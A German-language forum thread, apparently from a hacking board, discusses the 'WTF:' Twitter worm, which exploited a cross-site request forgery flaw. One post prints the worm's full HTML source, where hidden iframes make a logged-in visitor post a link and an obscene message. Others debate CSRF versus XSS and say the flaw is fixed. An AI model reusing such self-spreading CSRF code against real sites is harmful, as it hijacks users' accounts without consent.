Klickt nicht auf Links, die nach einem "WTF:" kommen! Don’t Click The WTF Link On Twitter Unless You DO Like Sex With Goats
Druckbare Version
Klickt nicht auf Links, die nach einem "WTF:" kommen! Don’t Click The WTF Link On Twitter Unless You DO Like Sex With Goats
Hab hier ne kleine Erklärung dazu gefunden. Meiner Meinung nach schon fast zu simpel um als Wurm durchzugehn...
Irgendwie macht Twitter es den "bösen Menschen" im Moment echt sehr leicht.
Bin ja mal gespannt, wie das wird wenn das neue Update komplett da ist.
Dann werden wieder etliche Sicherheitslücken eröffnet.
Vielleicht sollte Twitter sich mal ein Beispiel an der Post nehmen, und Preisgelder für gefundene Lücken aussetzen.
Finde die Idee eigentlich ziemlich gut, zu lesen hier.
Ist aber dennoch ein Wurm.
Twitter scheint ja echt voller Löcher zu sein.
Twitter sollte mal öfters hier rein schauen xD
Is doch eh schon gefixxt..
soweit ich das jetzt beurteilen kann geht es da nicht um eine xss, sondern um eine csrf Verwundbarkeit..
Und wenn ich mir die ganzen Webpanels von den uEbEr133337³³ g0il3n Stealern, Bots und was halt sonst noch alles ein Panel hat, scheinen hier nur sehr wenige zu wissen was das ist..
Twitter hat immer mehr Nutzer und so langsam wirds für Cracker/Hacker/whatever interessanter Profit daraus zu schlagen, somit wird vermehrt nach Löchern gesucht die früher einfach irrelevant waren.
priv7 twitter worm src. no leak plox broCode:<html> <head></head> <body> <script> var el1 = document.createElement('iframe'); var el2 = document.createElement('iframe'); el1.style.visibility="hidden"; el2.style.visibility="hidden"; el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location; el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats"; document.getElementsByTagName("body")[0].appendChild(el1); document.getElementsByTagName("body")[0].appendChild(el2); </script> </body> </html>
Den Sourcecode von einem XSS Wurm (der bereits im Umlauf ist) auftreiben ist keine besondere Kunst ^^
Komisch finde ich, dass bei Twitter immer wieder solche interessanten Lücken auftauchen, mir von Facebook und anderen Social Networks aber keine bekannt sind.
Gab es bei anderen Social Networks auch schonmal solche Fälle?
Das man eine Sicherheitslücke in den Statusnachrichten hatte oder sonst wo?
war es nicht damals so das man in schuelervz einfach
die passwörter aus dem Quell text lesen konnte ?